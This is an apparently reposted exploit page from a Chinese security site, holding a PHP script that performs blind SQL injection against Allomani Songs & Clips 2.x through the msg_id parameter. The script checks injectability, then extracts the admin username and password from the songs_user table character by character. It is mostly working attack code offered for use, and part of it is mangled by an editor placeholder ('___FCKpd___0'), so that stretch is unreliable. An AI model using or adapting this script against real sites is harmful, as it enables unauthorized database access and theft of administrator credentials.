首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit
来源:z.u5[at]hotmail.com 作者:ahwak2000 发布时间:2011-08-15  
<?php
/*
===============================================================
Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit
===============================================================
#[+]Version : 2.x
#[+]Author  : ahwak2000
#[+]home  : tryag.cc/cc/ ~ p0c.cc/vb/
#[+]Date   : 13.08.2011
#[+]E-mail : z.u5[at]hotmail.com
#[+]secript home: http://allomani.com
#[+]Tested On: win xp sp3
===============================================================
*/
ini_set("max_execution_time",0);
print_r('
                         ___________________________
________________________| Allomani 2.x eXploit 0d4y |_________________________
   _     _   _   _        _     _     _  _   _____     _____   _____   _____
 / _ \  | | | | | |  __  | |  / _ \  | |//  |  _  |   /  _  \ /  _  \ /  _  \
| |_| | | |_| | | | /  \ | | | |_| | |   \  |_| / /   | | | | | | | | | | | |
| | | | |  _  | | |/ /\ \| | | | | | | |\ \    / /__  | |_| | | |_| | | |_| |
|_| |_| |_| |_| |___/  \___| |_| |_| |_| \_\  |_____| \_____/ \_____/ \_____/
_______________________________________________________________________________
                              z.u5@hotmail.com
');
if ($argc<5) {
print_r('
-----------------------------------------------------------------------------

example: php '.$argv[0].' allomain.com /demo/ user_pass user_id

-----------------------------------------------------------------------------
');
die;
}
 function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){
$host = $victim;
$p = "http://".$host.$vic_dir;
//$cookie = base64_encode(":".$inj.":");
          $packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
		  $packet.="Host: ".$victim."\r\n";
          $packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass).";\r\n";
		  $packet.="Pragma: no-cache\r\n";
          $packet.="Connection: Close\r\n\r\n";

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	
___FCKpd___0
404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty(
___FCKpd___0
404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } return $data; } function AHWAK_GET($from){ preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out); return $out[1][0]; } $host1 = $argv[1]; $dir1=$argv[2]; $userpass=$argv[3]; $userid=$argv[4]; if ($argc > 4) { echo "\nPlease wait...\r\n\r\n"; $login= AHWAK($host1,$dir1,$userpass,$userid,""); if(!eregi ("profile",$login)){ echo "\n\n\t[-] You have entered an invalid username or password.\n\n\n"; exit; } $truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*")); $falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*")); if ($truths == $falses) { echo "\n\t sorry: magic_quotes_gpc = On ): \n"; exit; } echo "\n\t[+] Getting Admin UserName And PassWord\n\n\t"; echo "\n\t-----------------------------------\n\n"; for ($g = 1; $g <= 16; $g++) { //eidt for ($i = 46; $i <= 122; $i++) { $qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*")); if ($qest == $truths) { echo chr($i); } } } echo "\n\n\t-----------------------------------\n\n\tBy Ahwak2000\n\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PhpMyadmin XSRF Vuln (Execute
·TeeChart Professional ActiveX
·Simple HTTPd 1.42 Denial of Se
·MP3 CD Converter Professional
·MS10-026 Microsoft MPEG Layer-
·SikaBoom Remote Buffer Overflo
·NSHC Papyrus Heap Overflow Vul
·D.R. Software Audio Converter
·Contrexx Shopsystem <= 2.2 SP3
·Mozilla Firefox 3.6.16 mChanne
·BisonFTP Server <=v3.5 Remote
·Simple HTTPd 1.42 PUT Request
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved